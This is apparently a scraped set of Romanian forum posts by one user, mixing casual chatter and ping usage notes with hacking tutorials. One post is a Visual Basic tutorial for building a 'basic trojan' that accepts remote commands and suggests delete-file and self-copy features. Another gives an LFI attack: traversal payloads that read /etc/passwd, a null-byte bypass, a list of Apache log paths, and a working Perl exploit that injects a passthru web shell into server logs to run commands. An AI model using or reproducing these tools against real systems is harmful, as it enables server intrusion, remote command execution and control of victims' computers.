vladiii

sa zicem ca a mea este mai simpla

ete ca mie si prietenilor mei ne merge chestia asta... sigur nu faci tu ceva corect... ce versiune de messenger ai?

I wrote this for HackThisSite.org almost a year ago. Before you flame me: I don't care if you think VB is a noob language. It very well may be, but pointing it out in this topic doesn't help anyone. Also note that when I posted it on HTS, it removed all of the tabs I had put it in, which is why the code looks pretty sloppy. Oh, and at some spots it put in returns where it wasn't supposed to. I think anyone with half a brain could figure out where to remove the returns. In this tutorial you will learn about: - Client/Server applications - Winsock functions - Left() - Right() - Select Case First off you need to learn about client/server applications (note: this tutorial is for basic trojans and not for more advanced features like reverse connecting, those will be covered in a later tutorial if ever)Client/Server applicatons are broke into 2 parts, as one may guess. The client and the server. The client is the program that is connecting to the server and the server is accepting connections (although you can have it reverse connect to get by the router but that's not for this tutorial). Basicly the server is 'listening' for a connection and once a client attempts to connect to the server, the server accepts the connection and boom a connection is made. Once connected, you can send data from the client to the server and vice versa. An example would be a simple chat program where you're sending a message back and forth and the message is displayed on the other's screen. Now how can we do something like this in Visual Basic? It's quite simple. Since this is a test I'm just going to have you create ONE application with two forms rather than two applications, but you can create two applications if you wish and just follow the general instructions of this tutorial. Alright, first off we should create a listening server. Open up VB and make a standard EXE and add another form so you have Form1 and Form2. Rename the forms (change their .name properties) to frmClient and frmServer. Goto Project -> Components and put a check next to "Microsoft Winsock Control 6.0," if you do not have this control, do not worry! A simple google search for "MSWINSCK.OCX" will find you a download in no time (note: it goes in %systemroot%/system32/). Alright, now hit OK. What we just did: We added Microsoft's Winsock control to our toolbox. You can see that it is the last object on your toolbox (it has an icon that looks like 2 computers with a red wire connecting them)Add this control onto frmServer and change it's .name property to sckServer. Open up the code for frmServer and let's take a look at some of the subroutines/functions that the winsock control has. To do this, I usualy type in "sckServer." and a little list pops up with all the properties, etc. Here's one that looks interesting: "sckServer.Listen." There aren't any arguments for it so we need to find a way to set what port it's listening on or else it will error. Luckily another thing that I see in the list is "sckServer.LocalPort." Let's try to edit this to be what port we want. I'll be using 1234 for this example. Let's add some code to the Form_Load() subroutine of frmServer to do what we just found out: Private Sub Form_Load() sckServer.LocalPort = 1234 sckServer.Listen End Sub Goto Project -> Project 1 Properties... and change the Startup Object to frmServer. Save the program and run it. It seems to work fine, right? But there's nothing connecting to us so there's nothing to do. Even if they did try to connect to us, it would reject it because all we're doing is listening, not accepting. Let's add in accepting. I see that there is a subroutine that is called whenever someone tries connecting. It's called "ConnectionRequest:" Private Sub sckServer_ConnectionRequest(ByVal requestID As Long) End Sub Well it's very simple to make it accept so here it is: Private Sub sckServer_ConnectionRequest(ByVal requestID As Long) sckServer.Accept requestID End Sub Now let's make our client... Add a winsock control to frmClient and name it sckClient. Add 3 text boxes and 2 command buttons. Name them accordingly: Current Name: New Name: New .caption/.text Value Text1: txtIP: IP Address Text2: txtPort: Port Text3: txtMsg: Type your message here Command1: cmdConnect Command2: cmdShowMsg Now here's the commented code for this page: Private Sub cmdConnect_Click() 'Connect using sckClient sckClient.Connect txtIP.Text, txtPort.Text End Sub Private Sub cmdShowMsg_Click() 'Send data to the server containing msg| and then the message you wish to show sckClient.SendData "msg|" & txtMsg.Text End Sub Private Sub sckClient_Connect() 'Let us know that we're connected! MsgBox "Connected!", vbInformation, "Client" End Sub Private Sub sckClient_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) MsgBox Description, vbCritical, "Error" End Sub Surprisingly enough, that's it for the client. Now let's go back to the server and have it accept data... In frmServer: Private Sub sckServer_DataArrival(ByVal bytesTotal As Long) 'Define variables: Dim strData As String, strCommand As String, strArgument As String 'Get the data recieved and put it into strData: sckServer.GetData strData 'Grabs the left 4 characters of strData (EG: "msg|"): strCommand = Left(strData, 4) 'Grabs everything to the right of the command (EG: "This is a test" in the string "msg|This is a test"): strArgument = Right(strData, Len(strData) - Len(strCommand)) Select Case strCommand 'Sent the command to show an error message, show the error message: Case "msg|": MsgBox strArgument '[add more commands using this format] End Select End Sub Well, that all works and everything is fine! But why isn't frmClient showing up? That's because we have frmServer set as our startup form. Just add this code into frmServer's form_load subroutine: frmClient.Show Alright. We test it out and try to connect to ourselves ("127.0.0.1") and we get an error on this line: sckServer.Accept requestID apperently it isn't working how we want it to, but not to fear! Just add this line of code above it to Close the server (stop it from listening) and then accept the connection: sckServer.Close OK. We test it out and it works fine! We close the program because we're done and we go back to the source and now we're going to try out some other stuff.... actualy, take off the "we," this is extra practice for you! Extra practice: Add a button onto the client that closes the current connection (HINTS: sckClient.Close and sckServer_Close()) (don't forget that you need to start listening again after it closes or else it wont accept connections) Add in more functions for the client! Keep the commands 3 letters long with the "|" character at the end of them. A few ideas are "del|" to delete a file and "cpy|" to copy itself to a specific directory. Happy programming! Full source code included below for you lazy people. '''''frmClient:''''' Private Sub cmdConnect_Click() 'Connect using sckClient sckClient.Connect txtIP.Text, txtPort.Text End Sub Private Sub cmdShowMsg_Click() 'Send data to the server containing msg| and then the message you wish to show sckClient.SendData "msg|" & txtMsg.Text End Sub Private Sub sckClient_Connect() 'Let us know that we're connected! MsgBox "Connected!", vbInformation, "Client" End Sub Private Sub sckClient_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) MsgBox Description, vbCritical, "Error" End Sub '''''frmServer:''''' Private Sub Form_Load() sckServer.LocalPort = 1234 sckServer.Listen frmClient.Show End Sub Private Sub sckServer_ConnectionRequest(ByVal requestID As Long) sckServer.Close sckServer.Accept requestID End Sub Private Sub sckServer_DataArrival(ByVal bytesTotal As Long) 'Define variables: Dim strData As String, strCommand As String, strArgument As String 'Get the data recieved and put it into strData: sckServer.GetData strData 'Grabs the left 4 characters of strData (EG: "msg|"): strCommand = Left(strData, 4) 'Grabs everything to the right of the command (EG: "This is a test" in the string "msg|This is a test"): strArgument = Right(strData, Len(strData) - Len(strCommand)) Select Case strCommand 'Sent the command to show an error message, show the error message: Case "msg|": MsgBox strArgument '[add more commands using this format] End Select End Sub credit: JETT from #milw0rm.org

loool asta este roman 100%

@ping: sa nu pui spatiu intre msg: si idul de mess si sigur o sa iti mearga

daca doriti sa vedeti daca cineva este online/offline (nu conteaza daca v-a dat ignore sau invizibil) scrieti in casuta in care vorbiti cu el: msg:id si va aparea o iconita cu online/offline (fata zambitoare pt. online si fata trista pt. offline). Exemplu... eu intru in discutie cu ciriboflacs si scriu in casuta in care vorbesc cu el: msg:ciriboflacs si vad daca este online sau nu... acum nu este online enjoy it !!!

multumesc baieti :D v-am promis ca daca o sa-mi bag net la calculator o sa ma ocup de acest forum... acesta a fost primul tutorial, mai urmeaza multe altele... just wait

Buna ziua! In acest tutorial o sa invatati cum cum sa exploatati vulnerabilitatea LFI dintr-un site. Mai intai, sa vedem acest mic cod php: <?php $page = $_GET[/page][page]; include($page); ?> Acesta este un cod care nu ar trebui folosit niciodata, vulnerabil la LFI, pentru ca variabila $page nu este santinizata. Ok, acum sa profitam de aceasta vulnerabilitate, folosind urmatorul cod: site.host/index.php?page=../../../../../../../etc/passwd Daca siteul este gazduit Unix, parolele userilor sunt stocate in /etc/passwd si codul de mai sus ne arata aceste parole si usernameurile. Acum tot ce mai ai de facut este sa decodezi parola. O parola criptata, ar trebui sa arate cam asa: username:x:503:100:FullName:/home/username:/bin/sh In acest exemplu, parola este x, alt exemplu de parola fiind: username:!:503:100:FullName:/home/username:/bin/sh Alte "locuri" unde puteti gasi parolele in afara de /etc/passwd ar cam fi: /etc/shadow /etc/group /etc/security/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/security/limits In caz ca Browserul va arata la sfarsitul includerii un .php (si automat. /etc/passwd.php nu va mai exista), adaugati la sf includerii %00, serverul va omite tot ce scrie dupa %00. Exemplu de cod: site.host/index.php?file=../../../../../../../../etc/passwd%00 Acum vom incerca sa rulam comenzi pe server injectand coduri php in loguri, apoi rulandu-le. Cateva adrese de loguri: ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../../../../etc/httpd/logs/acces_log ../../../../../../../etc/httpd/logs/acces.log ../../../../../../../etc/httpd/logs/error_log ../../../../../../../etc/httpd/logs/error.log ../../../../../../../var/www/logs/access_log ../../../../../../../var/www/logs/access.log ../../../../../../../usr/local/apache/logs/access_log ../../../../../../../usr/local/apache/logs/access.log ../../../../../../../var/log/apache/access_log ../../../../../../../var/log/apache2/access_log ../../../../../../../var/log/apache/access.log ../../../../../../../var/log/apache2/access.log ../../../../../../../var/log/access_log ../../../../../../../var/log/access.log ../../../../../../../var/www/logs/error_log ../../../../../../../var/www/logs/error.log ../../../../../../../usr/local/apache/logs/error_log ../../../../../../../usr/local/apache/logs/error.log ../../../../../../../var/log/apache/error_log ../../../../../../../var/log/apache2/error_log ../../../../../../../var/log/apache/error.log ../../../../../../../var/log/apache2/error.log ../../../../../../../var/log/error_log ../../../../../../../var/log/error.log Ok, acum sa aruncam o privire asupra logului in care se salveaza paginile care nu exista si urmatorul cod: <? passthru(\$_GET[cmd]) ?>. Daca scriem in browser: site.host/<? passthru(\$_GET[cmd]) ?> O sa ne arate evident o pagina in care scrie ca acest cod nu exista pe server, deoarece browserul encodeaza automat URL'ul si pagina pe care noi am accesat-o, browserul o traduce in: site.host/%3C?%20passthru(\$_GET[cmd])%20?> Deci va trebui sa facem altceva... Putem utiliza urmatorul script perl: #!/usr/bin/perl -w use IO::Socket; use LWP::UserAgent; $site="victim.com"; $path="/folder/"; $code="<? passthru(\$_GET[cmd]) ?>"; $log = "../../../../../../../etc/httpd/logs/error_log"; print "Trying to inject the code"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n"; print $socket "GET ".$path.$code." HTTP/1.1\r\n"; print $socket "User-Agent: ".$code."\r\n"; print $socket "Host: ".$site."\r\n"; print $socket "Connection: close\r\n\r\n"; close($socket); print "\nCode $code sucssefully injected in $log \n"; print "\nType command to run or exit to end: "; $cmd = <STDIN>; while($cmd !~ "exit") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n"; print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1\r\n"; print $socket "Host: ".$site."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\n"; while ($show = <$socket>) { print $show; } print "Type command to run or exit to end: "; $cmd = <STDIN>; } Copy/Paste la chestia asta si salveaz-o ca ex.pl, dar nu uita sa modifici in exploit urmatoarele lucruri: 1) modifica numele siteului 2) modifica numele logului si calea catre el 3) schimba index.php= cu ce doresti tu Rulati scriptul si el va va intreba ce comenzi sa rulati !!! Va descurcati de aici incolo !!! Linkuri utile: [url]http://www.milw0rm.com/video/watch.php?id=57[/url] Acesta este un mic tutorial video, incercati sa-l vizionati ca este foarte bun. Proof of Concept: Autor in limba engleza: d3fcrash Traducerea si adaptarea+modificari: vladii

atunci mai uitati cateva, le gasiti pe google daca e, eu pun doar niste imagini: http://www.myforum.ro/images/template/21-clanz-darkness.jpg http://www.myforum.ro/images/template/56-counter-strike.jpg asta e mai tare enjoy it

cukie stilar fa tu rost de xss si mai vorbim... Nu pot sa cred ca pe un forum asa mare inca mai vorbim de "cum se sparge un id de mess"

daca nu sunt prea indiscret... de ce nu mai tineti templateul lui sysgh0st ??? un template frumusel ai putea sa gasesti aici: http://www.themesbase.com/?view=4204

poate aceasta mica comparatie intre cele 2 telefoane te va ajuta un pic: http://www.gsmland.ro/compare.php?brandId1=1&brandId2=4&modelId1=1001&modelId2=390 din cate vad eu acolo, samsung e900 este ceva mai bun... go for it

am luat argint la onm, la 1 pct de medalie de aur... urmeaza barajele pt obmj

inca va mai ocupati cu asa ceva?

deocamdata ma limitez la aur la olimpiada nationala. dar pe viitor nu se stie...

cradle of filth-her ghost in fog

sa iau medalie de aur la olimpiada internationala de matematica

e facut de tine kw3 ?

engleza si neamtza

6. -t ttl - seteaza campul TTL(time to live) al pachetelor ICMP trimise. Valori permise: 1-255. Exemplu: 1. Trimitem 10 pachete la www.google.ro: # ping -c 10 www.google.ro 2. Dorim sa testam conectivitatea cu 127.0.0.1 cu pachete de 1024 bytes din reteaua locala: # ping -s 1024 127.0.0.1 scuze pt. cele 3 posturi, dar am postat de pe telefon si nu puteam sa bag mai mult de 450 caractere intr-un post. enjoy it!

2. -f (flood) - trimite pachete echo-request fara a astepta sosirea pachetelor echo-reply. Pentru fiecare echo-request trimis, afiseaza un ''.'' iar pt. fiecare echo-reply primit afiseaza un ''backspace''. 3. -n (numeric) - destinatia este afisata doar numeric(prin adresa ip), fara a incerca sa se gaseasca aliasuri, nume de domeniu, etc. 4. -c count - nr. de pachete echo-request trimise. 5. -s packetsize-marimea pachetului ICMP ce se trimite. ...

Ping este o comanda care ne ajuta sa verificam conectivitatea la nivel de ip intre 2 calculatoare conectate in aceeasi retea sau la Internet. Ping testeaza doar conectivitatea intre calculatorul local si cel aflat la distanta. Formatul comenzii este: # ping [-b] [-n] [-c count] [-s dimensiunepachet] [-t ttl] destinatia. Parametrii au urmatoarea semnificatie: 1. -b (broadcast)- permite ping catre o adresa de broadcast. ...

ce aveti ma cu el? a fost chiar amuzant...

de cand nu mai am net, Winamp si adobe photoshop

si eu am windowsul piratat si nu mi-au aparut niciodata erorile cu genuine.